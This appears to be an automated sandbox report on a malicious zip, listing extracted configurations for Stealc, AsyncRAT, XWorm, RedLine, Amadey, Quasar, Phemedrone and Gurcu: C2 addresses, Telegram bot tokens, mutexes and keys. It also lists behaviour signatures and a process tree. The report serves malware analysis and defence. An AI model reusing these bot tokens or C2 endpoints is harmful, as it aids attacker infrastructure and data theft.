Analysis

  • max time kernel
    791s
  • max time network
    809s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20241023-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
  • submitted
    20-11-2024 22:39

Errors

Reason
Machine shutdown

General

  • Target

    4363463463464363463463463.exe.zip

  • Size

    4KB

  • MD5

    16d34133af438a73419a49de605576d9

  • SHA1

    c3dbcd70359fdad8835091c714a7a275c59bd732

  • SHA256

    e4ec3a45621dd556deeea5f953fa05909c82630e9f17baf6b14272a0360d62d1

  • SHA512

    59c0272d6faa2682b7a6ce1cd414d53cc39f06035f4f38a2e206965805034bf8012b02d59f428973965136d70c89f87ac3b17b5db9c1b1d49844be182b47a3d7

  • SSDEEP

    96:xBf1inGx9SfZ+VCv3wlTDMQ1kyKXyyJNOBIKkNvL5qK+7zHf6MlYOQVPGmcEy:xBfwncSf8Cv3w9DZjKXjmBIKEvLs97D5

Malware Config

Extracted

Family

stealc

Botnet

tale

C2

http://185.215.113.206

Attributes
  • url_path

    /6c4adf523b719729.php

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Default

C2

62.113.117.95:4449

Mutex

hwelcvbupaqfzors

Attributes
  • delay

    10

  • install

    false

  • install_folder

    %AppData%

aes.plain

Extracted

Family

xworm

Version

5.0

C2

panpoppo-25611.portmap.io:25611

Mutex

md2hTRMYBpbXprs1

Attributes
  • Install_directory

    %AppData%

  • install_file

    Steam.exe

  • pastebin_url

    https://pastebin.com/raw/Pit7WkAV

  • telegram

    https://api.telegram.org/bot7494729704:AAGLY8mnPxkjjCvoEz520yCBT4GLhlnhRaI/sendMessage?chat_id=7222032715

aes.plain
aes.plain

Extracted

Family

redline

Botnet

TG CLOUD @RLREBORN Admin @FATHEROFCARDERS

C2

89.105.223.196:29862

Extracted

Family

redline

Botnet

091024

C2

185.215.113.67:33160

Extracted

Family

amadey

Version

5.03

Botnet

7c4393

C2

http://185.215.113.217

Attributes
  • install_dir

    f9c76c1660

  • install_file

    corept.exe

  • strings_key

    9808a67f01d2f0720518035acbde7521

  • url_paths

    /CoreOPT/index.php

rc4.plain

Extracted

Family

stealc

Botnet

mars

C2

http://185.215.113.206

Attributes
  • url_path

    /c4becf79229cb002.php

Extracted

Family

quasar

Version

1.4.1

Botnet

Office04

C2

5.144.179.134:1604

Mutex

4d383135-1c23-463e-9bfb-fc292b6c8ee9

Attributes
  • encryption_key

    811B0CD80805D2F78D56441837D161EEF8A6E10A

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Quasar Client Startup

  • subdirectory

    SubDir

Extracted

Family

quasar

Version

1.4.0

Botnet

Office04

C2

192.168.31.99:4782

2001:4bc9:1f98:a4e::676:4782

255.255.255.0:4782

fe80::cabf:4cff:fe84:9572%17:4782

Mutex

1f65a787-81b8-4955-95e4-b7751e10cd50

Attributes
  • encryption_key

    A0B82A50BBC49EC084E3E53A9E34DF58BD7050B9

  • install_name

    Java Updater.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Java Updater

  • subdirectory

    SubDir

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

Default

C2

96.248.52.125:8031

Mutex

adobe_6SI8OkPnk

Attributes
  • delay

    3

  • install

    true

  • install_file

    update.exe

  • install_folder

    %Temp%

aes.plain

Extracted

Family

redline

Botnet

25072023

C2

185.215.113.67:40960

Extracted

Family

phemedrone

C2

https://api.telegram.org/bot7414426785:AAGjcWvGORe1_ToCk6Lpu9MSjNamkIOlrLs/sendDocument

Extracted

Family

gurcu

C2

https://api.telegram.org/bot7494729704:AAGLY8mnPxkjjCvoEz520yCBT4GLhlnhRaI/sendMessage?chat_id=7222032715

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • Detect Xworm Payload 4 IoCs
  • Gurcu family
  • Gurcu, WhiteSnake

    Gurcu is a malware stealer written in C#.

  • Modifies security service 2 TTPs 3 IoCs
  • Phemedrone

    An information and wallet stealer written in C#.

  • Phemedrone family
  • Phorphiex family
  • Phorphiex payload 3 IoCs
  • Phorphiex, Phorpiex

    Phorphiex or Phorpiex Malware family which infects systems to distribute other malicious payloads such as ransomware, stealers and cryptominers.

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 4 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 5 IoCs
  • Redline family
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Windows security bypass 2 TTPs 18 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Async RAT payload 1 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file
  • Stops running service(s) 4 TTPs
  • A potential corporate email address has been identified in the URL: [email protected]
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 15 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 6 IoCs
  • Executes dropped EXE 42 IoCs
  • Identifies Wine through registry keys 2 TTPs 1 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 2 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Windows security modification 2 TTPs 21 IoCs
  • Adds Run key to start application 2 TTPs 5 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Drops file in Windows directory 20 IoCs
  • Launches sc.exe 18 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Embeds OpenSSL 1 IoCs

    Embeds OpenSSL, may be used to circumvent TLS interception.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 18 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Enumerates system info in registry 2 TTPs 8 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 2 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 7 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 17 IoCs
  • Suspicious behavior: SetClipboardViewer 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 56 IoCs
  • Suspicious use of SendNotifyMessage 47 IoCs
  • Suspicious use of SetWindowsHookEx 29 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • cURL User-Agent 1 IoCs

    Uses User-Agent string associated with cURL utility.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3716
      • C:\Program Files\7-Zip\7zFM.exe
        "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe.zip"
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        PID:4628
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe"
        2⤵
        • Drops file in Windows directory
        • Enumerates system info in registry
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:1548
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ffbc201cc40,0x7ffbc201cc4c,0x7ffbc201cc58
          3⤵
            PID:2316
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1784,i,4826830529024513688,10620666923191134279,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=1628 /prefetch:2
            3⤵
              PID:4460
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1904,i,4826830529024513688,10620666923191134279,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=2084 /prefetch:3
              3⤵
                PID:1080
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2292,i,4826830529024513688,10620666923191134279,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=2560 /prefetch:8
                3⤵
                  PID:2624
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3160,i,4826830529024513688,10620666923191134279,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=3168 /prefetch:1
                  3⤵
                    PID:1180
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3192,i,4826830529024513688,10620666923191134279,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=3212 /prefetch:1
                    3⤵
                      PID:2244
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4548,i,4826830529024513688,10620666923191134279,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4576 /prefetch:1
                      3⤵
                        PID:2392
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4524,i,4826830529024513688,10620666923191134279,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4764 /prefetch:8
                        3⤵
                          PID:3876
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5092,i,4826830529024513688,10620666923191134279,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4772 /prefetch:8
                          3⤵
                            PID:3912
                          • C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe
                            "C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe" --reenable-autoupdates --system-level
                            3⤵
                            • Drops file in Windows directory
                            PID:1820
                            • C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe
                              "C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x274,0x29c,0x2a0,0x298,0x2a4,0x7ff7b1064698,0x7ff7b10646a4,0x7ff7b10646b0
                              4⤵
                              • Drops file in Windows directory
                              PID:2124
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=4920,i,4826830529024513688,10620666923191134279,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4764 /prefetch:1
                            3⤵
                              PID:3948
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=3152,i,4826830529024513688,10620666923191134279,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=5244 /prefetch:1
                              3⤵
                                PID:2324
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=3444,i,4826830529024513688,10620666923191134279,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=3224 /prefetch:1
                                3⤵
                                  PID:4652
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=3288,i,4826830529024513688,10620666923191134279,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=3228 /prefetch:8
                                  3⤵
                                    PID:1660
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3300,i,4826830529024513688,10620666923191134279,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=3156 /prefetch:8
                                    3⤵
                                    • Modifies registry class
                                    PID:1904
                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                  "C:\Program Files\Mozilla Firefox\firefox.exe"
                                  2⤵
                                    PID:4692
                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                      "C:\Program Files\Mozilla Firefox\firefox.exe"
                                      3⤵
                                      • Checks processor information in registry
                                      • Modifies registry class
                                      • Suspicious use of FindShellTrayWindow
                                      • Suspicious use of SendNotifyMessage
                                      • Suspicious use of SetWindowsHookEx
                                      PID:252
                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1968 -parentBuildID 20240401114208 -prefsHandle 1896 -prefMapHandle 1888 -prefsLen 23681 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e71072f0-22a3-46af-9671-04cc0ed3d890} 252 "\\.\pipe\gecko-crash-server-pipe.252" gpu
                                        4⤵
                                          PID:1744
                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2376 -parentBuildID 20240401114208 -prefsHandle 2368 -prefMapHandle 2364 -prefsLen 23717 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1e3e38a2-cee0-4f63-907d-5bb0f711452c} 252 "\\.\pipe\gecko-crash-server-pipe.252" socket
                                          4⤵
                                          • Checks processor information in registry
                                          PID:4052
                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3132 -childID 1 -isForBrowser -prefsHandle 2992 -prefMapHandle 3120 -prefsLen 23858 -prefMapSize 244658 -jsInitHandle 1112 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e137bc94-968b-40e8-a5ff-be2306c315cf} 252 "\\.\pipe\gecko-crash-server-pipe.252" tab
                                          4⤵
                                            PID:2532
                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4284 -childID 2 -isForBrowser -prefsHandle 4268 -prefMapHandle 4276 -prefsLen 29091 -prefMapSize 244658 -jsInitHandle 1112 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5c276da5-e08e-442b-aa87-b64786340060} 252 "\\.\pipe\gecko-crash-server-pipe.252" tab
                                            4⤵
                                              PID:1488
                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4920 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4912 -prefMapHandle 4908 -prefsLen 29091 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e8acaf5e-c53d-49b4-a48a-78b96fc5a9d7} 252 "\\.\pipe\gecko-crash-server-pipe.252" utility
                                              4⤵
                                              • Checks processor information in registry
                                              PID:2660
                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5248 -childID 3 -isForBrowser -prefsHandle 5232 -prefMapHandle 5236 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1112 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {abc8ff9d-20e2-4248-9fb8-38a4f8eb37a6} 252 "\\.\pipe\gecko-crash-server-pipe.252" tab
                                              4⤵
                                                PID:1856
                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5428 -childID 4 -isForBrowser -prefsHandle 5348 -prefMapHandle 5356 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1112 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8a103ae0-c9d5-4186-bea4-a9e0d5c79cf6} 252 "\\.\pipe\gecko-crash-server-pipe.252" tab
                                                4⤵
                                                  PID:2212
                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5536 -childID 5 -isForBrowser -prefsHandle 5616 -prefMapHandle 5612 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1112 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {79690a68-61e4-4e05-a28b-58a89067108e} 252 "\\.\pipe\gecko-crash-server-pipe.252" tab
                                                  4⤵
                                                    PID:3336
                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6052 -childID 6 -isForBrowser -prefsHandle 5388 -prefMapHandle 6020 -prefsLen 28048 -prefMapSize 244658 -jsInitHandle 1112 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0f3c9b0f-3039-4010-be92-822c8b6c785d} 252 "\\.\pipe\gecko-crash-server-pipe.252" tab
                                                    4⤵
                                                      PID:2920
                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6400 -childID 7 -isForBrowser -prefsHandle 6372 -prefMapHandle 6392 -prefsLen 28048 -prefMapSize 244658 -jsInitHandle 1112 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b72e227d-f0a1-478f-b86d-d921ae7e613d} 252 "\\.\pipe\gecko-crash-server-pipe.252" tab
                                                      4⤵
                                                        PID:4344
                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1588 -parentBuildID 20240401114208 -prefsHandle 6780 -prefMapHandle 6960 -prefsLen 30871 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1163f2e4-28a0-4546-a842-da17a6115851} 252 "\\.\pipe\gecko-crash-server-pipe.252" rdd
                                                        4⤵
                                                          PID:3188
                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6548 -parentBuildID 20240401114208 -sandboxingKind 1 -prefsHandle 7000 -prefMapHandle 6664 -prefsLen 30871 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {89c5d69e-c818-43f7-8704-cc1ae00fd5d1} 252 "\\.\pipe\gecko-crash-server-pipe.252" utility
                                                          4⤵
                                                          • Checks processor information in registry
                                                          PID:3084
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
                                                      2⤵
                                                      • Enumerates system info in registry
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                      • Suspicious use of FindShellTrayWindow
                                                      PID:4780
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x140,0x144,0x148,0x11c,0x14c,0x7ffbb6ab46f8,0x7ffbb6ab4708,0x7ffbb6ab4718
                                                        3⤵
                                                          PID:4996
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,3487222297909374954,9670724554702001368,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:2
                                                          3⤵
                                                            PID:2272
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,3487222297909374954,9670724554702001368,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2408 /prefetch:3
                                                            3⤵
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            PID:2164
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2128,3487222297909374954,9670724554702001368,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2908 /prefetch:8
                                                            3⤵
                                                              PID:1196
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,3487222297909374954,9670724554702001368,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3732 /prefetch:1
                                                              3⤵
                                                                PID:1336
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,3487222297909374954,9670724554702001368,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3740 /prefetch:1
                                                                3⤵
                                                                  PID:1284
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,3487222297909374954,9670724554702001368,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4484 /prefetch:1
                                                                  3⤵
                                                                    PID:1908
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,3487222297909374954,9670724554702001368,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2852 /prefetch:1
                                                                    3⤵
                                                                      PID:2456
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,3487222297909374954,9670724554702001368,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3948 /prefetch:1
                                                                      3⤵
                                                                        PID:4536
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
                                                                        3⤵
                                                                        • Drops file in Program Files directory
                                                                        PID:3332
                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x264,0x268,0x26c,0x240,0x270,0x7ff769aa5460,0x7ff769aa5470,0x7ff769aa5480
                                                                          4⤵
                                                                            PID:4448
